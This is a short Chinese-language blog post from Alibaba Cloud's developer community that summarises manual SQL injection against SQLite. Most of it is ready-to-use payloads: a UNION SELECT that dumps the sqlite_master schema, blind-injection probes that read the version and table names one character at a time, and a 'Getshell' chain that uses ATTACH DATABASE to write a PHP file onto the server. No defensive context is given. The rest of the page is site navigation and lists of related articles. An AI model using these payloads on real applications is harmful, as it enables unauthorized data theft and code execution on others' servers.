备案控制台

开发者社区数据库文章正文

SQLite手工注入方法小结

2016-08-11 1389

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： SQLite 官网下载：www.sqlite.org/download.html sqlite管理工具：http://www.yunqa.de/delphi/products/sqlitespy/index sqlite_master隐藏表，具体内容如下：字段：type/name/tb...

SQLite 官网下载：www.sqlite.org/download.html

sqlite管理工具：http://www.yunqa.de/delphi/products/sqlitespy/index

sqlite_master隐藏表，具体内容如下：

字段：type/name/tbl_name/rootpage/sql

sqlite注入测试：

1、Union select 查询

select * from test where id =1 and 1=2 union select name,sql from sqlite_master

2、盲注

select * from test where id =1 union select 1,length(sqlite_version())=6 //得到sqlite版本位数

select * from test where id =1 and substr(sqlite_version(),1,1)='3' //得到sqlite版本首位为3

select * from test where id =1 and substr((select name from sqlite_master where type='table' limit 0,1),1,1)='T' (大小写区分，有差别) //得到sqlite表名第一位为T

3、Getshell

select * from test where id =1 ;ATTACH DATABASE 'C:\\Sqlite\\xiaozi.php' AS pwn ; CREATE TABLE pwn.exp (dataz text) ; INSERT INTO pwn.exp (dataz) VALUES (' <?php phpinfo(); ?> '); --

参考链接：

Win7下SQLite安装配置与使用方法详解：http://www.codeceo.com/article/win7-sqlite-usage.html

Windows下安装配置SQLite和使用的教程:http://www.weste.net/2014/10-08/99347.html

文章标签：

PHP

SQL

Windows

数据库管理

关键词：

sqlite数据库

方法数据库

注入数据库

bypass

目录

相关文章

泡沫o0

|

2月前

|

API 数据库 C语言

【C/C++ 数据库 sqlite3】SQLite C语言API返回值深入解析

【C/C++ 数据库 sqlite3】SQLite C语言API返回值深入解析

泡沫o0

175 0 0

游客nmbcre4jd7shs

|

2月前

|

SQL 缓存 PHP

PHP技术探究：优化数据库查询效率的实用方法

本文将深入探讨PHP中优化数据库查询效率的实用方法，包括索引优化、SQL语句优化以及缓存机制的应用。通过合理的优化策略和技巧，可以显著提升系统性能，提高用户体验，是PHP开发者不容忽视的重要议题。

游客nmbcre4jd7shs

18 1 1

达芬奇要当程序员

|

2月前

|

存储缓存 NoSQL

利用Redis List实现数据库分页快速查询的有效方法

利用Redis List实现数据库分页快速查询的有效方法

达芬奇要当程序员

66 0 0

Y小夜

|

2月前

|

SQL 关系型数据库 MySQL

【MySQL】— —熟练掌握用SQL语句实现数据库和基本表的创建。熟练掌握MySQL的安装、客户端登录方法；熟练掌握MySQL的编码、数据类型等基础知识；掌握实体完整性的定义和维护方法、掌握参照完整性

【MySQL】— —熟练掌握用SQL语句实现数据库和基本表的创建。熟练掌握MySQL的安装、客户端登录方法；熟练掌握MySQL的编码、数据类型等基础知识；掌握实体完整性的定义和维护方法、掌握参照完整性

Y小夜

110 1 1

热爱嵌入式的小佳同学

|

1天前

|

数据库数据库管理关系型数据库

SQLite数据库介绍以及安装

SQLite数据库介绍以及安装

热爱嵌入式的小佳同学

14 4 4

SQLite数据库介绍以及安装

qiuqiushuibx

|

3天前

|

SQL Java 数据库连接

JDBC Java标准库提供的一些api(类+方法) 统一各种数据库提供的api

JDBC Java标准库提供的一些api(类+方法) 统一各种数据库提供的api

qiuqiushuibx

9 0 0

1941623231718325

|

12天前

|

存储大数据测试技术

矢量数据库的性能测试与评估方法

【4月更文挑战第30天】本文探讨了矢量数据库的性能测试与评估方法，强调其在大数据和AI时代的重要性。文中介绍了负载测试、压力测试、容量测试、功能测试和稳定性测试五大评估方法，以及实施步骤，包括确定测试目标、设计用例、准备环境、执行测试和分析结果。这些方法有助于确保数据库的稳定性和高效性，推动技术发展。

1941623231718325

8 0 0

桃李春风一杯酒

|

12天前

|

关系型数据库 MySQL PHP

【PHP 开发专栏】PHP 连接 MySQL 数据库的方法

【4月更文挑战第30天】本文介绍了 PHP 连接 MySQL 的两种主要方法：mysqli 和 PDO 扩展，包括连接、查询和处理结果的基本步骤。还讨论了连接参数设置、常见问题及解决方法，如连接失败、权限和字符集问题。此外，提到了高级技巧如使用连接池和缓存连接信息以优化性能。最后，通过实际案例分析了在用户登录系统和数据管理中的应用。

桃李春风一杯酒

75 1 1

香甜可口草莓蛋糕

|

13天前

|

SQL 关系型数据库 MySQL

利用 SQL 注入识别数据库方法总结

利用 SQL 注入识别数据库方法总结

香甜可口草莓蛋糕

16 4 4

景天科技苑

|

13天前

|

API 数据库 Python

Python web框架fastapi数据库操作ORM（二）增删改查逻辑实现方法

Python web框架fastapi数据库操作ORM（二）增删改查逻辑实现方法

景天科技苑

34 1 1

热门文章

最新文章

嵌入式数据库sqlite3【基础篇】基本命令操作，小白一看就懂（C/C++）

阿里云数据库使用方法，从购买、创建数据库账号密码到连接数据库全流程

Python中使用pymysql和pymssql进行数据库操作的完整指南

校招｜「阿里云瑶池数据库」2025届实习生招聘正式启动！

SpringBoot整合Mybatis连接Oracle数据库

Windows公网远程连接MongoDB数据库【无公网IP】

一款好用的数据库表结构文档生成工具

【mysql】—— 数据库的操作

悦数图数据库推出 AI 知识图谱构建器及图语言生成助手

Sql Server数据库Sa密码如何修改

阿里云数据库使用方法，从购买、创建数据库账号密码到连接数据库全流程

【mysql】—— 数据库的操作

悦数图数据库推出 AI 知识图谱构建器及图语言生成助手

Windows公网远程连接MongoDB数据库【无公网IP】

嵌入式数据库sqlite3【基础篇】基本命令操作，小白一看就懂（C/C++）

Java代码高效连接数据库

如何处理爬取到的数据，例如存储到数据库或文件中？

Python中使用pymysql和pymssql进行数据库操作的完整指南

SpringBoot整合Mybatis连接Oracle数据库

一款好用的数据库表结构文档生成工具

相关课程

更多

数据库的前世今生

数据库核心概念

从传统数据库到云数据库演进

数据库常见问题排查

数据库及SQL/MySQL基础

高校精品课-西安交通大学 -数据库理论与技术

相关电子书

更多

2022 DTCC-阿里云一站式数据库上云最佳实践

云时代的数据库技术趋势

超大型金融机构国产数据库全面迁移成功实践

相关实验场景

更多

PolarDB for AI：在数据库中通过SQL实现AI能力

云原生HTAP数据库，让你的交易和分析一库搞定

Excel文件转存到RDS数据库

快速体验PolarDB开源数据库

手把手教你把IoT传感器数据存储到数据库

WorkBench操作云上数据库

下一篇

部署LAMP环境（Alibaba Cloud Linux 3）